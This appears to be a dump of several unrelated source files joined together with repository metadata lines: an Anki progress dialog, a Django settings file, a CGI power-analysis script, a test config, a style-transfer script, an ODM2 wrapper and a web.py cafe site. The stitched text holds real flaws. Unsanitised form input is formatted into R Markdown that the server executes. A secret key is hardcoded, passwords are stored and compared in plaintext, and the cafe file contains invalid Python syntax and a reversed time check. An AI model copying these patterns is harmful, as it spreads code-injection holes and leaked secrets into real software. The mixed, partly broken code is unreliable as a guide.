self.timer(100, func, False, requiresCollection)
t = QTimer(self.mw)
if not repeat:
t.setSingleShot(True)
qconnect(t.timeout, handler)
t.start(ms)
return t
# Creating progress dialogs
##########################################################################
def start(
self,
max: int = 0,
min: int = 0,
label: Optional[str] = None,
parent: Optional[QDialog] = None,
immediate: bool = False,
) -> Optional[ProgressDialog]:
self._levels += 1
if self._levels > 1:
return None
# setup window
parent = parent or self.app.activeWindow()
if not parent and self.mw.isVisible():
parent = self.mw
label = label or tr(TR.QT_MISC_PROCESSING)
self._win = ProgressDialog(parent)
self._win.form.progressBar.setMinimum(min)
self._win.form.progressBar.setMaximum(max)
self._win.form.progressBar.setTextVisible(False)
self._win.form.label.setText(label)
self._win.setWindowTitle("Anki")
self._win.setWindowModality(Qt.ApplicationModal)
self._win.setMinimumWidth(300)
self._setBusy()
self._shown: float = 0
self._counter = min
self._min = min
self._max = max
self._firstTime = time.time()
self._lastUpdate = time.time()
self._updating = False
self._show_timer = QTimer(self.mw)
self._show_timer.setSingleShot(True)
self._show_timer.start(immediate and 100 or 600)
qconnect(self._show_timer.timeout, self._on_show_timer)
return self._win
def update(
self,
label: Optional[str] = None,
value: Optional[int] = None,
process: bool = True,
maybeShow: bool = True,
max: Optional[int] = None,
) -> None:
# print self._min, self._counter, self._max, label, time.time() - self._lastTime
if not self.mw.inMainThread():
print("progress.update() called on wrong thread")
return
if self._updating:
return
if maybeShow:
self._maybeShow()
if not self._shown:
return
elapsed = time.time() - self._lastUpdate
if label:
self._win.form.label.setText(label)
self._max = max or 0
self._win.form.progressBar.setMaximum(self._max)
if self._max:
self._counter = value or (self._counter + 1)
self._win.form.progressBar.setValue(self._counter)
if process and elapsed >= 0.2:
self._updating = True
self.app.processEvents() # type: ignore #possibly related to https://github.com/python/mypy/issues/6910
self._updating = False
self._lastUpdate = time.time()
def finish(self) -> None:
self._levels -= 1
self._levels = max(0, self._levels)
if self._levels == 0:
if self._win:
self._closeWin()
self._unsetBusy()
if self._show_timer:
self._show_timer.stop()
self._show_timer = None
def clear(self) -> None:
"Restore the interface after an error."
if self._levels:
self._levels = 1
self.finish()
def _maybeShow(self) -> None:
if not self._levels:
return
if self._shown:
return
delta = time.time() - self._firstTime
if delta > 0.5:
self._showWin()
def _showWin(self) -> None:
self._shown = time.time()
self._win.show()
def _closeWin(self) -> None:
if self._shown:
while True:
# give the window system a second to present
# window before we close it again - fixes
# progress window getting stuck, especially
# on ubuntu 16.10+
elap = time.time() - self._shown
if elap >= 0.5:
break
self.app.processEvents(QEventLoop.ExcludeUserInputEvents) # type: ignore #possibly related to https://github.com/python/mypy/issues/6910
self._win.cancel()
self._win = None
self._shown = 0
def _setBusy(self) -> None:
self.mw.app.setOverrideCursor(QCursor(Qt.WaitCursor))
def _unsetBusy(self) -> None:
self.app.restoreOverrideCursor()
def busy(self) -> int:
"True if processing."
return self._levels
def _on_show_timer(self) -> None:
self._show_timer = None
self._showWin()
def want_cancel(self) -> bool:
win = self._win
if win:
return win.wantCancel
else:
return False
def set_title(self, title: str) -> None:
win = self._win
if win:
win.setWindowTitle(title)
class ProgressDialog(QDialog):
def __init__(self, parent: QWidget) -> None:
QDialog.__init__(self, parent)
disable_help_button(self)
self.form = aqt.forms.progress.Ui_Dialog()
self.form.setupUi(self)
self._closingDown = False
self.wantCancel = False
# required for smooth progress bars
self.form.progressBar.setStyleSheet("QProgressBar::chunk { width: 1px; }")
def cancel(self) -> None:
self._closingDown = True
self.hide()
def closeEvent(self, evt: QCloseEvent) -> None:
if self._closingDown:
evt.accept()
else:
self.wantCancel = True
evt.ignore()
def keyPressEvent(self, evt: QKeyEvent) -> None:
if evt.key() == Qt.Key_Escape:
evt.ignore()
self.wantCancel = True
| agpl-3.0 | -4,262,308,446,230,237,000 | 31.801653 | 153 | 0.546485 | false |
halftk/OpenShareNow | OpenShareNow/OpenShareNow/settings.py | 1 | 2380 | """
Django settings for OpenShareNow project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import os.path
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'etlrhar2t*+sbit%hoibvxftrvy%#6%)&9#x6@p()94cqr%i-v'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(os.path.dirname(__file__),'../osnow/templates'),
)
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'osnow',
'django.contrib.admin',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'OpenShareNow.urls'
WSGI_APPLICATION = 'OpenShareNow.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'basededades.db',
'USER': '',
'PASSWORD': '',
#'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
| gpl-2.0 | -430,860,475,850,630,200 | 24.319149 | 85 | 0.714286 | false |
s-andrews/powerguide | www/powerguide.py | 1 | 3812 | import tempfile
import os
import shutil
import subprocess
import shlex
import cgi
import sys
# For development only
import cgitb
cgitb.enable()
# Set some global preferences
template_dir = os.path.dirname(os.path.realpath(__file__))+"/../R/"
pandoc_location = "/usr/lib/rstudio/bin/pandoc"
path = "/usr/bin:/bin"
# Set some environment variables which will otherwise cause things
# to complain
os.environ["HOME"] = template_dir
os.environ["PATH"] = path
def run_analysis (template,variables):
# Make a temporary directory, copy the template to it
# applying the substitutions we need, run the template
# and then send the output back on STDOUT
# Find the template
template_text = ""
with open(template) as file:
template_text = file.read()
# Create a temporary working space
tempDir = tempfile.TemporaryDirectory()
# Write the template to this directory
with open(tempDir.name+"/script.Rmd","w") as file:
file.write(template_text.format(**variables))
# Copy over all of the png files from the template directory
for file in os.listdir(template_dir):
if file[-4:] == ".png":
shutil.copyfile(template_dir+"/"+file,tempDir.name+"/"+file)
# Run the render command
subprocess.call(shlex.split("Rscript -e 'Sys.setenv(RSTUDIO_PANDOC=\"{pandoc}\") ; rmarkdown::render(\"{dir}/script.Rmd\", quiet=TRUE, output_file=\"{dir}/output.html\")'".format(pandoc=pandoc_location,dir=tempDir.name)))
# Read and output the HTML
sys.stdout.buffer.write(b"Content-Type: text/html\n\n")
with open(tempDir.name+"/output.html","rb") as file:
sys.stdout.buffer.write(file.read())
# Clean up
tempDir.cleanup()
if (__name__ == "__main__"):
# Read in the options from the web server
options = cgi.FieldStorage()
# We need to figure out what template we're going to use,
# and what options we need to pass on to the template to
# generate the correct report.
if options["type"].value == "Continuous" and options["groups"].value == "2" and options["normal"].value == "Yes":
template = template_dir+"2_sample_continuous.Rmd"
field_values = {"power": options["power"].value,"significance": options["significance"].value, "difference": options["effect_size"].value, "variance": options["variance"].value}
run_analysis(template,field_values)
elif options["type"].value == "Continuous" and options["groups"].value == "1" and options["normal"].value == "Yes":
template = template_dir+"1_sample_continuous.Rmd"
field_values = {"power": options["power"].value,"significance": options["significance"].value, "difference": options["effect_size"].value, "variance": options["variance"].value}
run_analysis(template,field_values)
elif options["type"].value == "Continuous" and options["groups"].value[:1] == "3" and options["normal"].value == "Yes":
template = template_dir+"3_sample_continuous.Rmd"
field_values = {"group_number": options["group_number"].value, "variance_between":options["variance_between"].value, "power": options["power"].value,"significance": options["significance"].value, "difference": options["effect_size"].value, "variance": options["variance"].value}
run_analysis(template,field_values)
elif options["type"].value == "Categorical" and options["groups"].value == "2" :
template = template_dir+"2_sample_categorical.Rmd"
field_values = {"power": options["power"].value,"significance": options["significance"].value, "start_proportion": options["start_proportion"].value, "end_proportion": options["end_proportion"].value}
run_analysis(template,field_values)
else:
print ("Content-type: text/plain\n")
print ("Not supported yet...")
print(options["type"].value)
# template = template_dir+"2_sample_continuous.Rmd"
# run_analysis(template,{"power":0.8,"significance":0.05,"difference":10,"variance":5})
| gpl-3.0 | 4,918,219,642,766,401,000 | 31.305085 | 280 | 0.706978 | false |
Yukarumya/Yukarum-Redfoxes | testing/mozharness/configs/marionette/windows_config.py | 1 | 1876 | # This is a template config file for marionette production on Windows.
import os
import sys
config = {
# marionette options
"marionette_address": "localhost:2828",
"test_manifest": "unit-tests.ini",
"virtualenv_python_dll": 'c:/mozilla-build/python27/python27.dll',
"virtualenv_path": 'venv',
"exes": {
'python': 'c:/mozilla-build/python27/python',
'virtualenv': ['c:/mozilla-build/python27/python', 'c:/mozilla-build/buildbotve/virtualenv.py'],
'hg': 'c:/mozilla-build/hg/hg',
'mozinstall': ['%s/build/venv/scripts/python' % os.getcwd(),
'%s/build/venv/scripts/mozinstall-script.py' % os.getcwd()],
'tooltool.py': [sys.executable, 'C:/mozilla-build/tooltool.py'],
},
"find_links": [
"http://pypi.pvt.build.mozilla.org/pub",
"http://pypi.pub.build.mozilla.org/pub",
],
"pip_index": False,
"buildbot_json_path": "buildprops.json",
"default_actions": [
'clobber',
'read-buildbot-config',
'download-and-extract',
'create-virtualenv',
'install',
'run-tests',
],
"default_blob_upload_servers": [
"https://blobupload.elasticbeanstalk.com",
],
"blob_uploader_auth_file" : os.path.join(os.getcwd(), "oauth.txt"),
"download_minidump_stackwalk": True,
"download_symbols": "ondemand",
"suite_definitions": {
"marionette_desktop": {
"options": [
"-vv",
"--log-raw=%(raw_log_file)s",
"--log-errorsummary=%(error_summary_file)s",
"--log-html=%(html_report_file)s",
"--binary=%(binary)s",
"--address=%(address)s",
"--symbols-path=%(symbols_path)s"
],
"run_filename": "",
"testsdir": ""
},
},
}
| mpl-2.0 | -4,901,755,299,401,112,000 | 31.344828 | 104 | 0.541045 | false |
EnthyrosVanAkel/neural_artistic_style | neural_artistic_style.py | 1 | 3686 | #!/usr/bin/env python
import os
import argparse
import numpy as np
import scipy.misc
import deeppy as dp
from matconvnet import vgg19_net
from style_network import StyleNetwork
def weight_tuple(s):
try:
conv_idx, weight = map(int, s.split(','))
return conv_idx, weight
except:
raise argparse.ArgumentTypeError('weights must by "conv_idx,weight"')
def weight_array(weights):
array = np.zeros(19)
for idx, weight in weights:
array[idx] = weight
norm = np.sum(array)
if norm > 0:
array /= norm
return array
def imread(path):
return scipy.misc.imread(path).astype(dp.float_)
def imsave(path, img):
img = np.clip(img, 0, 255).astype(np.uint8)
return scipy.misc.imsave(path, img)
def to_bc01(img):
return np.transpose(img, (2, 0, 1))[np.newaxis, ...]
def to_rgb(img):
return np.transpose(img[0], (1, 2, 0))
def run():
parser = argparse.ArgumentParser(
description='Neural artistic style.',
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('--subject', required=True, type=str,
help='subject image')
parser.add_argument('--style', required=True, type=str,
help='style image')
parser.add_argument('--output', default='out.png', type=str,
help='output image')
parser.add_argument('--animation', default='animation', type=str,
help='output animation directory')
parser.add_argument('--iterations', default=500, type=int,
help='Number of iterations')
parser.add_argument('--learn-rate', default=5.0, type=float,
help='Learning rate')
parser.add_argument('--subject-weights', nargs='*', type=weight_tuple,
default=[(9, 1)],
help='list of subject weights (conv_idx,weight)')
parser.add_argument('--style-weights', nargs='*', type=weight_tuple,
default=[(0, 1), (2, 1), (4, 1), (8, 1), (12, 1)],
help='list of style weights (conv_idx,weight)')
parser.add_argument('--subject-ratio', type=float, default=2e-2,
help='weight of subject relative to style')
parser.add_argument('--vgg19', default='imagenet-vgg-verydeep-19.mat',
type=str, help='VGG-19 .mat file')
args = parser.parse_args()
layers, img_mean = vgg19_net(args.vgg19, pool_method='avg')
# Inputs
pixel_mean = np.mean(img_mean, axis=(0, 1))
style_img = imread(args.style)
subject_img = imread(args.subject)
style_img -= pixel_mean
subject_img -= pixel_mean
# Setup network
subject_weights = weight_array(args.subject_weights) * args.subject_ratio
style_weights = weight_array(args.style_weights)
net = StyleNetwork(layers, to_bc01(subject_img), to_bc01(style_img),
subject_weights, style_weights)
# Repaint image
def net_img():
return to_rgb(net.image) + pixel_mean
if not os.path.exists(args.animation):
os.mkdir(args.animation)
params = net._params
learn_rule = dp.Adam(learn_rate=args.learn_rate)
learn_rule_states = [learn_rule.init_state(p) for p in params]
for i in range(args.iterations):
imsave(os.path.join(args.animation, '%.4d.png' % i), net_img())
cost = np.mean(net._update())
for param, state in zip(params, learn_rule_states):
learn_rule.step(param, state)
print('Iteration: %i, cost: %.4f' % (i, cost))
imsave(args.output, net_img())
if __name__ == "__main__":
run()
| mit | -5,447,275,127,889,458,000 | 31.910714 | 77 | 0.597938 | false |
Castronova/EMIT | wrappers/odm2_data.py | 1 | 6423 | __author__ = 'tonycastronova'
import datetime as dt
from api_old.ODM2.Core.services import readCore
from api_old.ODM2.Results.services import readResults
# from shapely import wkb
import stdlib, uuid
from utilities.status import Status
import datatypes
from utilities import geometry
class odm2(object):
def __init__(self,resultid, session):
# get result object and result timeseries
core = readCore(session)
obj = core.getResultByID(resultID=int(resultid))
readres = readResults(session)
results = readres.getTimeSeriesValuesByResultId(resultId=int(resultid))
# separate the date and value pairs in the timeseries
dates = [date.ValueDateTime for date in results]
values = [val.DataValue for val in results]
# basic exchange item info
id = uuid.uuid4().hex[:8]
name = obj.VariableObj.VariableCode
desc = obj.VariableObj.VariableDefinition
#unit = obj.UnitObj.UnitsName
#vari = obj.VariableObj.VariableNameCV
type = stdlib.ExchangeItemType.OUTPUT
start = min(dates)
end = max(dates)
# build variable
variable = stdlib.Variable()
variable.VariableDefinition(obj.VariableObj.VariableDefinition)
variable.VariableNameCV(obj.VariableObj.VariableNameCV)
# build unit
unit = stdlib.Unit()
unit.UnitAbbreviation(obj.UnitObj.UnitsAbbreviation)
unit.UnitName(obj.UnitObj.UnitsName)
unit.UnitTypeCV(obj.UnitObj.UnitsTypeCV)
# build geometries
# todo: need to specify srs and elevation
wkb = str(obj.FeatureActionObj.SamplingFeatureObj.FeatureGeometry.data)
geom = geometry.fromWKB(wkb)
# build exchange item object
oei = stdlib.ExchangeItem(id=id,
name=name,
desc=desc,
geometry=geom,
unit=unit,
variable=variable,type=type )
# set global parameters
self.__id = id
self.__name = name
self.__start=start
self.__end=end
self.__output={self.__name: oei}
self.__desc=obj.VariableObj.VariableDefinition
self.__current_time = self.simulation_start()
self.__obj = obj
self.__resultid = obj.ResultID
self.__session = session
self.__status = Status.Loaded
def type(self):
return datatypes.ModelTypes.Data
def save(self):
#return [self.get_output_by_name(outputname=self.name())]
#return [self.__output]
return []
def run(self,inputs):
# set the status to finished
self.status(Status.Finished)
def run_timestep(self,inputs,time):
# set the status to finished
self.status(Status.Finished)
def prepare(self):
'''
Called before simulation run to prepare the model
:return: READY status
'''
# query the database
#return [self.get_output_by_name(outputname=self.name())]
self.status(Status.Ready)
def session(self):
return self.__session
def obj(self):
return self.__obj
#
# def actionid(self):
# return self.__actionid
def resultid(self):
return self.__resultid
def id(self):
return self.__id
def time_step(self):
"""
ini configuration file
"""
#return (int(self.__params['time_step'][0]['value']),self.__params['time_step'][0]['unit_type_cv'])
raise NotImplementedError('This is an abstract method that must be implemented!')
def outputs(self):
"""
ini configuration file
"""
return self.__output
def inputs(self):
return {}
def simulation_start(self):
return self.__start
def simulation_end(self):
return self.__end
def name(self):
return self.__name
def description(self):
return self.__desc
def current_time(self):
return self.__current_time
def increment_time(self, time):
value,unit = self.time_step()
# if unit == 'millisecond': self.__current_time += dt.timedelta(milliseconds=value)
# elif unit == 'second': self.__current_time += dt.timedelta(seconds =value)
# elif unit == 'minute': self.__current_time += dt.timedelta(minutes=value)
# elif unit == 'hour': self.__current_time += dt.timedelta(hours=value)
# elif unit == 'day': self.__current_time += dt.timedelta(days=value)
# else:
# raise Exception('Unknown unit: %s'%unit)
if unit == 'millisecond': time += dt.timedelta(milliseconds=value)
elif unit == 'second': time += dt.timedelta(seconds =value)
elif unit == 'minute': time += dt.timedelta(minutes=value)
elif unit == 'hour': time += dt.timedelta(hours=value)
elif unit == 'day': time += dt.timedelta(days=value)
else:
raise Exception('Unknown unit: %s'%unit)
return time
def get_output_by_name(self,outputname):
outputs = self.outputs()
if outputs.has_key(outputname):
return outputs[outputname]
else:
print 'Could not find output: %s' + outputname
return None
#return [self.__output]
#
# outputs = self.outputs()
#
# for output in outputs:
# if output.name() == outputname:
# return output
#
# raise Exception('Could not find output: %s' + outputname)
#raise NotImplementedError('This is an abstract method that must be implemented!')
def set_geom_values(self,variablename,geometry,datavalues):
#
# item = self.get_output_by_name(variablename)
#
# geometries = item.geometries()
# for geom in geometries:
# if geom.geom().equals(geometry):
# geom.datavalues().set_timeseries(datavalues)
# return
# raise Exception ('Error setting data for variable: %s' % variablename)
raise NotImplementedError('This is an abstract method that must be implemented!')
def status(self, value=None):
if value is not None:
self.__status = value
return self.__status | gpl-2.0 | 4,727,562,517,179,709,000 | 29.590476 | 107 | 0.589288 | false |
torresj/practica-3 | Código/tiposCafes.py | 1 | 18836 | /*
Esta archivo pertenece a la aplicación "practica 3" bajo licencia GPLv2.
Copyright (C) 2014 Jaime Torres Benavente.
Este programa es software libre. Puede redistribuirlo y/o modificarlo bajo los términos
de la Licencia Pública General de GNU según es publicada por la Free Software Foundation,
bien de la versión 2 de dicha Licencia o bien (según su elección) de cualquier versión
posterior.
Este programa se distribuye con la esperanza de que sea útil, pero SIN NINGUNA GARANTÍA,
incluso sin la garantía MERCANTIL implícita o sin garantizar la CONVENIENCIA PARA UN
PROPÓSITO PARTICULAR. Véase la Licencia Pública General de GNU para más detalles.
Debería haber recibido una copia de la Licencia Pública General junto con este programa.
Si no ha sido así, escriba a la Free Software Foundation, Inc., en 675 Mass Ave, Cambridge,
MA 02139, EEUU.
*/
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 30 12:07:52 2013
@author: jaime
"""
import web
from web.contrib.template import render_mako
from web import form
import pymongo
import feedparser
import time
render = render_mako(
directories=['plantillas'],
input_encoding='utf-8',
output_encoding='utf-8',
)
'''
Esta funcion sirve para actualizar el tiempo del ultimo
acceso al rss, si fuera necesario. Comprobara si han pasado
mas de 10 minutos desde la ultima vez, y si es asi, volverá
a descargar el rss
'''
def actualiza_tiempo():
conn=pymongo.MongoClient()
db=conn.mydb
cache=db.cache
tiempo1=time.time()
t=cache.find_one({"rss":"el pais"})
tiempo2=t[u'ult_act']
if((tiempo2- tiempo1)>600):
cache.update({"rss": "el pais"}, {"$set": {"ult_act": time.time()}})
rss=feedparser.parse('http://ep00.epimg.net/rss/tags/ultimas_noticias.xml')
conn.close()
#Variable para RSS, también almacenamos el momento en que se descargo el rss
rss=feedparser.parse('http://ep00.epimg.net/rss/tags/ultimas_noticias.xml')
actualiza_tiempo()
#Validadores
vpass=form.regexp(r'.{7,20}$',"La contrasenia debe tener mas de 7 caracteres")
#Formulario Para el login
formul = form.Form(
form.Textbox("user",form.notnull,description = "Usuario:"),
form.Password("password",form.notnull,vpass,description = "Contraseña:"),
form.Button("Login")
)
#Clases para manejar las paginas de los tipos de cafes
class Cafe1:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
#Variables para rellenar la pagina web
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 1"
cuerpo="Descripcion detallada del cafe 1"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
modo="index"
error=''
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 1"
cuerpo="Descripcion del cafe 1"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
#buscamos al usuario en la base de datos
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
error='contrasña erronea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
class Cafe2:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
#Variables para rellenar la pagina web
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 2"
cuerpo="Descripcion detallada del cafe 2"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 2"
cuerpo="Descripcion del cafe 2"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
#buscamos al usuario en la base de datos
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
error='contrasña erronea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
class Cafe3:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
#Variables para rellenar la pagina web
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 1"
cuerpo="Descripcion detallada del cafe 3"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 3"
cuerpo="Descripcion del cafe 3"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
if not login.validates():
log=False
user=''
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
else:
s=web.ctx.session
#buscamos al usuario en la base de datos
conn=pymongo.MongoClient()
db=conn.mydb
usuarios=db.usuarios
us=usuarios.find_one({"user":login['user'].value})
conn.close()
try:
if login['password'].value==us[u'pass']:
log=True
user=login['user'].value
s.usuario=user
else:
log=False
user=''
error='contrasña erronea'
except TypeError:
log=False;
user=''
error='El usuario no existe'
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
class Cafe4:
def GET(self):
s=web.ctx.session
try:
if s.usuario!='':
log=True
user=s.usuario
else:
log=False
user=''
except AttributeError:
s.usuario=''
log=False
user=''
#Variables para rellenar la pagina web
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
cafes=[["Cafe1","Descripcion del cafe 1"],["Cafe2","Descripcion del cafe 2"],["Cafe3","Descripcion del cafe 3"],["Cafe4","Descripcion del cafe 4"]]
cafeEspecial=["Cafe especial de la casa","Descripcion cafe especial de la casa"]
piepagina="Copyright © 2013 Jaime Torres Benavente"
subtitulo2="Cafe 4"
cuerpo="Descripcion detallada del cafe 4"
subtitulo3=""
subtitulo4=""
servicios=[]
reg=False
error=''
modo="index"
actualiza_tiempo()
return render.plantilla(
titulo=titulo,
login=login,
log=log,
user=user,
subtitulo1=subtitulo1,
cafes=cafes,
cafeEspecial=cafeEspecial,
subtitulo2=subtitulo2,
cuerpo=cuerpo,
registro=registro,
subtitulo3=subtitulo3,
subtitulo4=subtitulo4,
servicios=servicios,
piepagina=piepagina,
reg=reg,
modo=modo,
error=error,
rss=rss)
def POST(self):
login=formul()
registro=""
titulo="CAFE DEL MAR"
subtitulo1="Oferta de cafes"
